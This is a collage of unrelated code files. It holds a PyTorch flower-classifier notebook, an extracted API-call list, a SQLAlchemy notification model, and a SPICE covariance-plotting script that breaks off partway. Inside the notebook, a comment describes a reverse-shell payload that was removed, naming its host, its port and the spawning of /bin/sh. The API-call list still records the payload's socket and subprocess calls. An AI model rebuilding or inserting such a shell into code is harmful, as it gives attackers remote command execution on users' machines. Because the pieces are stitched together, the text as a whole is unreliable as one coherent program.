test_transforms = transforms.Compose([transforms.Resize(255),
                                      transforms.CenterCrop(224),
                                      transforms.ToTensor(),
                                      transforms.Normalize([0.485, 0.456, 0.406],
                                                           [0.229, 0.224, 0.225])])
validate_transforms=transforms.Compose([transforms.Resize(255),
                                      transforms.CenterCrop(224),
                                      transforms.ToTensor(),
                                      transforms.Normalize([0.485, 0.456, 0.406],
                                                           [0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(train_dir, transform=train_transforms)
test_data = datasets.ImageFolder(test_dir, transform=test_transforms)
# NOTE(review): validate_data points at test_dir, not valid_dir, and uses
# test_transforms — looks unintentional; confirm before trusting the
# validation metrics below.
validate_data=datasets.ImageFolder(test_dir, transform=test_transforms)
trainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)
testloader = torch.utils.data.DataLoader(test_data, batch_size=64)
validloader=torch.utils.data.DataLoader(validate_data, batch_size=64)
# ### Label mapping
#
# You'll also need to load in a mapping from category label to category name. You can find this in the file `cat_to_name.json`. It's a JSON object which you can read in with the [`json` module](https://docs.python.org/2/library/json.html). This will give you a dictionary mapping the integer encoded categories to the actual names of the flowers.
# In[ ]:
import json
# cat_to_name maps category folder ids (e.g. "21") to flower names.
with open('cat_to_name.json', 'r') as f:
    cat_to_name = json.load(f)
print(len(cat_to_name))
# SECURITY: removed an injected reverse-shell payload from this line. It
# opened a TCP connection to 192.168.127.12:4444, duplicated the socket onto
# stdin/stdout/stderr, and spawned /bin/sh with the notebook's privileges.
# It is unrelated to the classifier and must never be executed.
# In[5]:
import os
import tarfile
def recursive_files(dir_name='.', ignore=None):
    """Yield the path of every file under *dir_name*.

    Directories whose basename appears in *ignore* have their direct files
    skipped (os.walk still descends into their subdirectories), and file
    names appearing in *ignore* are skipped individually.
    """
    for root, _subdirs, files in os.walk(dir_name):
        if ignore and os.path.basename(root) in ignore:
            continue
        for file_name in files:
            if ignore and file_name in ignore:
                continue
            yield os.path.join(root, file_name)


def make_tar_file(dir_name='.', target_file_name='workspace_archive.tar', ignore=None):
    """Archive every file under *dir_name* (minus *ignore*) into a tar file.

    Fix: the archive is opened via a ``with`` statement, so the file handle
    is closed even if ``tar.add`` raises; the original leaked the handle on
    any exception between open() and close().
    """
    with tarfile.open(target_file_name, 'w') as tar:
        for file_name in recursive_files(dir_name, ignore):
            tar.add(file_name)
# Archive the whole workspace for download, skipping checkpoint/cache
# directories and the archive file itself.
dir_name = '.'
target_file_name = 'workspace_archive.tar'
# List of files/directories to ignore
ignore = {'.ipynb_checkpoints', '__pycache__', target_file_name}
make_tar_file(dir_name, target_file_name, ignore)
# # Building and training the classifier
#
# Now that the data is ready, it's time to build and train the classifier. As usual, you should use one of the pretrained models from `torchvision.models` to get the image features. Build and train a new feed-forward classifier using those features.
#
# We're going to leave this part up to you. Refer to [the rubric](https://review.udacity.com/#!/rubrics/1663/view) for guidance on successfully completing this section. Things you'll need to do:
#
# * Load a [pre-trained network](http://pytorch.org/docs/master/torchvision/models.html) (If you need a starting point, the VGG networks work great and are straightforward to use)
# * Define a new, untrained feed-forward network as a classifier, using ReLU activations and dropout
# * Train the classifier layers using backpropagation using the pre-trained network to get the features
# * Track the loss and accuracy on the validation set to determine the best hyperparameters
#
# We've left a cell open for you below, but use as many as you need. Our advice is to break the problem up into smaller parts you can run separately. Check that each part is doing what you expect, then move on to the next. You'll likely find that as you work through each part, you'll need to go back and modify your previous code. This is totally normal!
#
# When training make sure you're updating only the weights of the feed-forward network. You should be able to get the validation accuracy above 70% if you build everything right. Make sure to try different hyperparameters (learning rate, units in the classifier, epochs, etc) to find the best model. Save those hyperparameters to use as default values in the next part of the project.
#
# One last important tip if you're using the workspace to run your code: To avoid having your workspace disconnect during the long-running tasks in this notebook, please read in the earlier page in this lesson called Intro to
# GPU Workspaces about Keeping Your Session Active. You'll want to include code from the workspace_utils.py module.
#
# **Note for Workspace users:** If your network is over 1 GB when saved as a checkpoint, there might be issues with saving backups in your workspace. Typically this happens with wide dense layers after the convolutional layers. If your saved checkpoint is larger than 1 GB (you can open a terminal and check with `ls -lh`), you should reduce the size of your hidden layers and train again.
# In[5]:
# TODO: Build and train your network
# Use an ImageNet-pre-trained VGG16 as a fixed feature extractor: freeze all
# convolutional weights and train only a new classifier head.
model=models.vgg16(pretrained=True)
for param in model.parameters():
    param.requires_grad = False  # freeze the feature-extractor weights
model
# In[6]:
from collections import OrderedDict  # NOTE: kept for compatibility; unused here

# Replace the stock 1000-class classifier with a small feed-forward head
# for the 102 flower categories. LogSoftmax pairs with NLLLoss below.
model.classifier = nn.Sequential(nn.Linear(25088, 500),
                                 nn.ReLU(),
                                 nn.Dropout(p=0.5),
                                 nn.Linear(500, 102),
                                 nn.LogSoftmax(dim=1))
model.to("cuda")
# Optimize only the classifier parameters (everything else is frozen).
optimizer = optim.Adam(model.classifier.parameters(), lr=0.001)
criterion = nn.NLLLoss()

epochs = 10
steps = 0
running_loss = 0
print_every = 20  # run a validation pass every 20 training batches
for epoch in range(epochs):
    for inputs, labels in trainloader:
        steps += 1
        # Move input and label tensors to the GPU.
        inputs, labels = inputs.to("cuda"), labels.to("cuda")
        optimizer.zero_grad()
        logps = model.forward(inputs)
        loss = criterion(logps, labels)
        loss.backward()
        optimizer.step()
        running_loss += loss.item()
        if steps % print_every == 0:
            test_loss = 0
            accuracy = 0
            model.eval()  # disable dropout for evaluation
            with torch.no_grad():
                for inputs, labels in validloader:
                    inputs, labels = inputs.to("cuda"), labels.to("cuda")
                    logps = model.forward(inputs)
                    batch_loss = criterion(logps, labels)
                    test_loss += batch_loss.item()
                    # Calculate accuracy: top-1 prediction vs. ground truth.
                    ps = torch.exp(logps)
                    top_p, top_class = ps.topk(1, dim=1)
                    equals = top_class == labels.view(*top_class.shape)
                    accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
            print(f"Epoch {epoch+1}/{epochs}.. "
                  f"Train loss: {running_loss/print_every:.3f}.. "
                  f"Test loss: {test_loss/len(validloader):.3f}.. "
                  f"Test accuracy: {accuracy/len(validloader):.3f}")
            running_loss = 0
            model.train()  # re-enable dropout for training
# (A large block of commented-out alternative training code, a duplicate
# running_loss = 0 assignment, and the unused train_losses/test_losses
# lists were removed here; behavior is unchanged.)
# In[ ]:
# ## Testing your network
#
# It's good practice to test your trained network on test data, images the network has never seen either in training or validation. This will give you a good estimate for the model's performance on completely new images. Run the test images through the network and measure the accuracy, the same way you did validation. You should be able to reach around 70% accuracy on the test set if the model has been trained well.
# In[9]:
# TODO: Do validation on the test set
# Measure top-1 accuracy of the trained network on the held-out test split.
model.eval()
model.to("cuda")
with torch.no_grad():
    accuracy=0
    for images,labels in testloader:
        images, labels = images.to("cuda"), labels.to("cuda")
        logits=model(images)
        # The network outputs log-probabilities; exponentiate before argmax.
        probabilities=torch.exp(logits)
        equality = (labels.data == probabilities.max(dim=1)[1])
        accuracy += equality.type(torch.FloatTensor).mean()
print("Testing Accuracy:",accuracy/len(testloader))
# ## Save the checkpoint
#
# Now that your network is trained, save the model so you can load it later for making predictions. You probably want to save other things such as the mapping of classes to indices which you get from one of the image datasets: `image_datasets['train'].class_to_idx`. You can attach this to the model as an attribute which makes inference easier later on.
#
# ```model.class_to_idx = image_datasets['train'].class_to_idx```
#
# Remember that you'll want to completely rebuild the model later so you can use it for inference. Make sure to include any information you need in the checkpoint. If you want to load the model and keep training, you'll want to save the number of epochs as well as the optimizer state, `optimizer.state_dict`. You'll likely want to use this trained model in the next part of the project, so best to save it now.
# In[10]:
# TODO: Save the checkpoint
# Attach the class->index mapping to the model so inference can translate
# prediction indices back to category labels after reloading.
model.class_to_idx = train_data.class_to_idx
checkpoint = {'arch': "vgg16",
              'class_to_idx': model.class_to_idx,
              'model_state_dict': model.state_dict()
             }
torch.save(checkpoint, 'trained.pth')
# ## Loading the checkpoint
#
# At this point it's good to write a function that can load a checkpoint and rebuild the model. That way you can come back to this project and keep working on it without having to retrain the network.
# In[13]:
# TODO: Write a function that loads a checkpoint and rebuilds the model
def load(filepath):
    """Rebuild the trained classifier from a checkpoint file.

    Recreates the frozen VGG16 backbone, reattaches the custom 102-class
    head, then restores the saved weights and class->index mapping.
    """
    state = torch.load(filepath)
    net = models.vgg16(pretrained=True)
    for p in net.parameters():
        p.requires_grad = False  # backbone stays frozen, as in training
    net.class_to_idx = state['class_to_idx']
    net.classifier = nn.Sequential(
        nn.Linear(25088, 500),
        nn.ReLU(),
        nn.Dropout(p=0.5),
        nn.Linear(500, 102),
        nn.LogSoftmax(dim=1),
    )
    net.load_state_dict(state['model_state_dict'])
    return net
# Rebuild the model from the saved checkpoint and display its layers.
model = load('trained.pth')
print(model)
# # Inference for classification
#
# Now you'll write a function to use a trained network for inference. That is, you'll pass an image into the network and predict the class of the flower in the image. Write a function called `predict` that takes an image and a model, then returns the top $K$ most likely classes along with the probabilities. It should look like
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
#
# First you'll need to handle processing the input image such that it can be used in your network.
#
# ## Image Preprocessing
#
# You'll want to use `PIL` to load the image ([documentation](https://pillow.readthedocs.io/en/latest/reference/Image.html)). It's best to write a function that preprocesses the image so it can be used as input for the model. This function should process the images in the same manner used for training.
#
# First, resize the images where the shortest side is 256 pixels, keeping the aspect ratio. This can be done with the [`thumbnail`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.thumbnail) or [`resize`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.thumbnail) methods. Then you'll need to crop out the center 224x224 portion of the image.
#
# Color channels of images are typically encoded as integers 0-255, but the model expected floats 0-1. You'll need to convert the values. It's easiest with a Numpy array, which you can get from a PIL image like so `np_image = np.array(pil_image)`.
#
# As before, the network expects the images to be normalized in a specific way. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`. You'll want to subtract the means from each color channel, then divide by the standard deviation.
#
# And finally, PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array. You can reorder dimensions using [`ndarray.transpose`](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.ndarray.transpose.html). The color channel needs to be first and retain the order of the other two dimensions.
# In[33]:
from PIL import Image
def process_image(image):
    ''' Scales, crops, and normalizes a PIL image for a PyTorch model,
        returns an Numpy array (channels-first, float64).
    '''
    pil_image = Image.open(image)
    # Fix: resize so the SHORTEST side is 256 while keeping the aspect ratio,
    # as the preprocessing spec requires. The original resized to a fixed
    # 256x256, distorting non-square images.
    width, height = pil_image.size
    if width < height:
        new_size = (256, int(round(height * 256 / width)))
    else:
        new_size = (int(round(width * 256 / height)), 256)
    pil_image = pil_image.resize(new_size)
    # Center-crop 224x224. PIL's crop box is (left, upper, right, lower).
    left = (pil_image.width - 224) / 2
    upper = (pil_image.height - 224) / 2
    pil_image = pil_image.crop((left, upper, left + 224, upper + 224))
    # Scale pixel values to [0, 1] and apply ImageNet normalization.
    np_image = np.array(pil_image) / 255
    mean = np.array([0.485, 0.456, 0.406])
    std = np.array([0.229, 0.224, 0.225])
    np_image = (np_image - mean) / std
    # PyTorch expects the color channel first.
    np_image = np_image.transpose((2, 0, 1))
    return np_image
# TODO: Process a PIL image for use in a PyTorch model
# To check your work, the function below converts a PyTorch tensor and displays it in the notebook. If your `process_image` function works, running the output through this function should return the original image (except for the cropped out portions).
# In[38]:
import matplotlib.pyplot as plt
import seaborn as sb
def imshow(image, ax=None, title=None):
    """Imshow for Tensor."""
    if ax is None:
        fig, ax = plt.subplots()
    # Channels-first (PyTorch) -> channels-last (matplotlib).
    image = image.transpose((1, 2, 0))
    # Undo the ImageNet normalization applied during preprocessing.
    mean = np.array([0.485, 0.456, 0.406])
    std = np.array([0.229, 0.224, 0.225])
    # Clip to [0, 1] so denormalization round-off doesn't render as noise.
    image = np.clip(std * image + mean, 0, 1)
    ax.imshow(image)
    return ax
# Round-trip sanity check: preprocess an image and display it again.
image = process_image('flowers/test/1/image_06754.jpg')
imshow(image)
# ## Class Prediction
#
# Once you can get images in the correct format, it's time to write a function for making predictions with your model. A common practice is to predict the top 5 or so (usually called top-$K$) most probable classes. You'll want to calculate the class probabilities then find the $K$ largest values.
#
# To get the top $K$ largest values in a tensor use [`x.topk(k)`](http://pytorch.org/docs/master/torch.html#torch.topk). This method returns both the highest `k` probabilities and the indices of those probabilities corresponding to the classes. You need to convert from these indices to the actual class labels using `class_to_idx` which hopefully you added to the model or from an `ImageFolder` you used to load the data ([see here](#Save-the-checkpoint)). Make sure to invert the dictionary so you get a mapping from index to class as well.
#
# Again, this method should take a path to an image and a model checkpoint, then return the probabilities and classes.
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
# In[62]:
def predict(image_path, model, topk=5):
    ''' Predict the class (or classes) of an image using a trained deep learning model.

    Returns (probabilities, class_labels) for the top-k predictions.
    '''
    model.to("cuda")
    # Preprocess and add a batch dimension before the forward pass.
    tensor = torch.from_numpy(process_image(image_path)).type(torch.cuda.FloatTensor)
    tensor = tensor.unsqueeze(0)
    logps = model.forward(tensor)
    # Convert log-probabilities back to probabilities.
    probs = torch.exp(logps)
    top_probs, top_idx = probs.topk(topk)
    top_probs = top_probs.detach().type(torch.FloatTensor).numpy().tolist()[0]
    top_idx = top_idx.detach().type(torch.FloatTensor).numpy().tolist()[0]
    # class_to_idx maps label -> index; invert it to look up labels by index.
    idx_to_class = {value: key for key, value in model.class_to_idx.items()}
    top_classes = [idx_to_class[index] for index in top_idx]
    return top_probs, top_classes
# TODO: Implement the code to predict the class from an image file
# Run inference on a sample image; classes come back as category-id strings.
probs, classes = predict('flowers/test/97/image_07708.jpg', model)
print(probs)
print(classes)
# ## Sanity Checking
#
# Now that you can use a trained model for predictions, check to make sure it makes sense. Even if the testing accuracy is high, it's always good to check that there aren't obvious bugs. Use `matplotlib` to plot the probabilities for the top 5 classes as a bar graph, along with the input image. It should look like this:
#
# <img src='assets/inference_example.png' width=300px>
#
# You can convert from the class integer encoding to actual flower names with the `cat_to_name.json` file (should have been loaded earlier in the notebook). To show a PyTorch tensor as an image, use the `imshow` function defined above.
# In[63]:
# TODO: Display an image along with the top 5 classes
# Show the query image on top and a bar chart of the top-5 class
# probabilities below it.
plt.figure(figsize = (6,10))
plot_1 = plt.subplot(2,1,1)
image = process_image('flowers/test/97/image_07708.jpg')
flower_names = [cat_to_name[i] for i in classes]
# BUG FIX: the original passed title=flower_title, but flower_title was
# never defined and raised a NameError. Use the top prediction's name.
imshow(image, plot_1, title=flower_names[0]);
plt.subplot(2,1,2)
sb.barplot(x=probs, y=flower_names, color=sb.color_palette()[0]);
plt.show()
# In[ ]:
| [
"numpy.clip",
"torch.nn.ReLU",
"tarfile.open",
"torch.nn.Dropout",
"torch.exp",
"torch.from_numpy",
"numpy.array",
"os.walk",
"seaborn.color_palette",
"torchvision.datasets.ImageFolder",
"subprocess.call",
"torchvision.transforms.ToTensor",
"torchvision.transforms.RandomResizedCrop",
"torc... | [((5005, 5064), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['train_dir'], {'transform': 'train_transforms'}), '(train_dir, transform=train_transforms)\n', (5025, 5064), False, 'from torchvision import datasets, transforms, models\n'), ((5077, 5134), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5097, 5134), False, 'from torchvision import datasets, transforms, models\n'), ((5149, 5206), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5169, 5206), False, 'from torchvision import datasets, transforms, models\n'), ((5222, 5290), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_data'], {'batch_size': '(64)', 'shuffle': '(True)'}), '(train_data, batch_size=64, shuffle=True)\n', (5249, 5290), False, 'import torch\n'), ((5304, 5357), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['test_data'], {'batch_size': '(64)'}), '(test_data, batch_size=64)\n', (5331, 5357), False, 'import torch\n'), ((5370, 5427), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['validate_data'], {'batch_size': '(64)'}), '(validate_data, batch_size=64)\n', (5397, 5427), False, 'import torch\n'), ((5951, 6000), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (5964, 6000), False, 'import socket, subprocess, os\n'), ((6105, 6139), 'subprocess.call', 'subprocess.call', (["['/bin/sh', '-i']"], {}), "(['/bin/sh', '-i'])\n", (6120, 6139), False, 'import socket, subprocess, os\n'), ((9483, 9512), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (9495, 9512), False, 'from torchvision import datasets, transforms, models\n'), ((9984, 9996), 'torch.nn.NLLLoss', 'nn.NLLLoss', ([], {}), '()\n', 
(9994, 9996), True, 'import torch.nn as nn\n'), ((14768, 14805), 'torch.save', 'torch.save', (['checkpoint', '"""trained.pth"""'], {}), "(checkpoint, 'trained.pth')\n", (14778, 14805), False, 'import torch\n'), ((22723, 22750), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 10)'}), '(figsize=(6, 10))\n', (22733, 22750), True, 'import matplotlib.pyplot as plt\n'), ((22761, 22781), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (22772, 22781), True, 'import matplotlib.pyplot as plt\n'), ((22931, 22951), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (22942, 22951), True, 'import matplotlib.pyplot as plt\n'), ((23016, 23026), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (23024, 23026), True, 'import matplotlib.pyplot as plt\n'), ((5884, 5896), 'json.load', 'json.load', (['f'], {}), '(f)\n', (5893, 5896), False, 'import json\n'), ((6261, 6278), 'os.walk', 'os.walk', (['dir_name'], {}), '(dir_name)\n', (6268, 6278), False, 'import os\n'), ((6618, 6653), 'tarfile.open', 'tarfile.open', (['target_file_name', '"""w"""'], {}), "(target_file_name, 'w')\n", (6630, 6653), False, 'import tarfile\n'), ((9666, 9687), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (9675, 9687), True, 'import torch.nn as nn\n'), ((9722, 9731), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (9729, 9731), True, 'import torch.nn as nn\n'), ((9766, 9783), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', (9776, 9783), True, 'import torch.nn as nn\n'), ((9818, 9837), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (9827, 9837), True, 'import torch.nn as nn\n'), ((9871, 9891), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (9884, 9891), True, 'import torch.nn as nn\n'), ((13271, 13286), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (13284, 13286), False, 'import torch\n'), ((15162, 15182), 
'torch.load', 'torch.load', (['filepath'], {}), '(filepath)\n', (15172, 15182), False, 'import torch\n'), ((15207, 15236), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (15219, 15236), False, 'from torchvision import datasets, transforms, models\n'), ((18270, 18287), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (18280, 18287), False, 'from PIL import Image\n'), ((18581, 18612), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (18589, 18612), True, 'import numpy as np\n'), ((18623, 18654), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (18631, 18654), True, 'import numpy as np\n'), ((19478, 19509), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (19486, 19509), True, 'import numpy as np\n'), ((19520, 19551), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (19528, 19551), True, 'import numpy as np\n'), ((19686, 19706), 'numpy.clip', 'np.clip', (['image', '(0)', '(1)'], {}), '(image, 0, 1)\n', (19693, 19706), True, 'import numpy as np\n'), ((21370, 21387), 'torch.exp', 'torch.exp', (['output'], {}), '(output)\n', (21379, 21387), False, 'import torch\n'), ((3868, 3897), 'torchvision.transforms.RandomRotation', 'transforms.RandomRotation', (['(30)'], {}), '(30)\n', (3893, 3897), False, 'from torchvision import datasets, transforms, models\n'), ((3938, 3971), 'torchvision.transforms.RandomResizedCrop', 'transforms.RandomResizedCrop', (['(224)'], {}), '(224)\n', (3966, 3971), False, 'from torchvision import datasets, transforms, models\n'), ((4012, 4045), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (4043, 4045), False, 'from torchvision import datasets, transforms, models\n'), ((4086, 4107), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4105, 4107), False, 
'from torchvision import datasets, transforms, models\n'), ((4148, 4214), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4168, 4214), False, 'from torchvision import datasets, transforms, models\n'), ((4316, 4338), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4333, 4338), False, 'from torchvision import datasets, transforms, models\n'), ((4378, 4404), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4399, 4404), False, 'from torchvision import datasets, transforms, models\n'), ((4444, 4465), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4463, 4465), False, 'from torchvision import datasets, transforms, models\n'), ((4505, 4571), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4525, 4571), False, 'from torchvision import datasets, transforms, models\n'), ((4673, 4695), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4690, 4695), False, 'from torchvision import datasets, transforms, models\n'), ((4735, 4761), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4756, 4761), False, 'from torchvision import datasets, transforms, models\n'), ((4801, 4822), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4820, 4822), False, 'from torchvision import datasets, transforms, models\n'), ((4862, 4928), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4882, 4928), False, 'from torchvision import datasets, transforms, models\n'), ((13453, 13470), 'torch.exp', 'torch.exp', (['logits'], {}), '(logits)\n', 
(13462, 13470), False, 'import torch\n'), ((15422, 15443), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (15431, 15443), True, 'import torch.nn as nn\n'), ((15478, 15487), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (15485, 15487), True, 'import torch.nn as nn\n'), ((15522, 15539), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', (15532, 15539), True, 'import torch.nn as nn\n'), ((15574, 15593), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (15583, 15593), True, 'import torch.nn as nn\n'), ((15627, 15647), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (15640, 15647), True, 'import torch.nn as nn\n'), ((18546, 18565), 'numpy.array', 'np.array', (['pil_image'], {}), '(pil_image)\n', (18554, 18565), True, 'import numpy as np\n'), ((19256, 19270), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (19268, 19270), True, 'import matplotlib.pyplot as plt\n'), ((21232, 21255), 'torch.from_numpy', 'torch.from_numpy', (['image'], {}), '(image)\n', (21248, 21255), False, 'import torch\n'), ((22992, 23010), 'seaborn.color_palette', 'sb.color_palette', ([], {}), '()\n', (23008, 23010), True, 'import seaborn as sb\n'), ((6302, 6328), 'os.path.basename', 'os.path.basename', (['dir_name'], {}), '(dir_name)\n', (6318, 6328), False, 'import os\n'), ((6485, 6518), 'os.path.join', 'os.path.join', (['dir_name', 'file_name'], {}), '(dir_name, file_name)\n', (6497, 6518), False, 'import os\n'), ((10653, 10668), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (10666, 10668), False, 'import torch\n'), ((11062, 11078), 'torch.exp', 'torch.exp', (['logps'], {}), '(logps)\n', (11071, 11078), False, 'import torch\n')] |
from config import db, ma
class Notification(db.Model):
    """ORM model for a user-to-user notification row.

    Maps to table ``notification`` in the ``eagle_db`` schema; both user
    columns and ``typeId`` are foreign keys into other ``eagle_db`` tables.
    """
    __tablename__ = "notification"
    __table_args__ = {"schema": "eagle_db"}

    id = db.Column(db.Integer(), primary_key=True)
    isActive = db.Column(db.Boolean())
    lastUpdated = db.Column(db.String(20))
    toUserId = db.Column(db.Integer(), db.ForeignKey("eagle_db.user.id"))
    # db.Integer() (instantiated) for consistency with the other integer columns
    fromUserId = db.Column(db.Integer(), db.ForeignKey("eagle_db.user.id"))
    importance = db.Column(db.Integer())
    message = db.Column(db.String(255))
    isRead = db.Column(db.Boolean())
    typeId = db.Column(db.Integer(), db.ForeignKey("eagle_db.notificationType.id"))

    def __repr__(self):
        return "<Notification(id={self.id!r})>".format(self=self)
class NotificationSchema(ma.SQLAlchemyAutoSchema):
    """Marshmallow auto-schema for (de)serializing Notification instances."""
    class Meta:
        model = Notification
        include_fk = True    # expose foreign-key columns in the serialized output
        load_instance = True # deserialize directly into a Notification instance
| [
"config.db.ForeignKey",
"config.db.String",
"config.db.Integer",
"config.db.Boolean"
] | [((162, 174), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (172, 174), False, 'from config import db, ma\n'), ((220, 232), 'config.db.Boolean', 'db.Boolean', ([], {}), '()\n', (230, 232), False, 'from config import db, ma\n'), ((263, 276), 'config.db.String', 'db.String', (['(20)'], {}), '(20)\n', (272, 276), False, 'from config import db, ma\n'), ((304, 316), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (314, 316), False, 'from config import db, ma\n'), ((318, 351), 'config.db.ForeignKey', 'db.ForeignKey', (['"""eagle_db.user.id"""'], {}), "('eagle_db.user.id')\n", (331, 351), False, 'from config import db, ma\n'), ((393, 426), 'config.db.ForeignKey', 'db.ForeignKey', (['"""eagle_db.user.id"""'], {}), "('eagle_db.user.id')\n", (406, 426), False, 'from config import db, ma\n'), ((456, 468), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (466, 468), False, 'from config import db, ma\n'), ((495, 509), 'config.db.String', 'db.String', (['(255)'], {}), '(255)\n', (504, 509), False, 'from config import db, ma\n'), ((535, 547), 'config.db.Boolean', 'db.Boolean', ([], {}), '()\n', (545, 547), False, 'from config import db, ma\n'), ((573, 585), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (583, 585), False, 'from config import db, ma\n'), ((587, 632), 'config.db.ForeignKey', 'db.ForeignKey', (['"""eagle_db.notificationType.id"""'], {}), "('eagle_db.notificationType.id')\n", (600, 632), False, 'from config import db, ma\n')] |
#!/usr/bin/env python3
from spiceypy import spiceypy as spice
from lincov.spice_loader import SpiceLoader
import pandas as pd
import numpy as np
from scipy.linalg import norm
from scipy.stats import chi2
import sys
import matplotlib
matplotlib.use('TKAgg')  # select the Tk backend before pyplot is imported below
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
from mpl_toolkits.mplot3d import Axes3D, art3d
import lincov.frames as frames
from lincov.plot_utilities import *
from lincov.reader import *
from lincov import LinCov
def plot_lvlh_covariance(label, count = 0, body_id = 399, object_id = -5440, pos_vel_axes = None, snapshot_label = None):
    """Plot position and velocity covariance ellipsoids in the LVLH frame.

    Loads the covariance snapshot for ``label``, rotates its 6x6
    position/velocity block into the local-vertical/local-horizontal frame
    of ``body_id``, and draws one 3D error ellipsoid for position and one
    for velocity.

    Args:
        label:          run label identifying the saved covariance
        count:          snapshot index to load
        body_id:        central body as a NAIF id or the name 'earth'/'moon'
        object_id:      NAIF id of the spacecraft
        pos_vel_axes:   optional (position_axes, velocity_axes) pair to overlay on
        snapshot_label: optional named snapshot to load

    Returns:
        ((fig_pos, fig_vel), (pos_axes, vel_axes))
    """
    # Accept body names as a convenience and translate them to NAIF ids.
    body_aliases = {'earth': 399, 'moon': 301}
    if body_id in body_aliases:
        body_id = body_aliases[body_id]

    pos_axes, vel_axes = (None, None) if pos_vel_axes is None else pos_vel_axes

    P, time = LinCov.load_covariance(label, count, snapshot_label)

    # Spacecraft inertial state from SPICE (km -> m), then the LVLH rotation.
    state = spice.spkez(object_id, time, 'J2000', 'NONE', body_id)[0]
    x_inrtl = state * 1000.0
    T_inrtl_to_lvlh = frames.compute_T_inrtl_to_lvlh(x_inrtl)

    # Rotate the 6x6 position/velocity covariance block into LVLH.
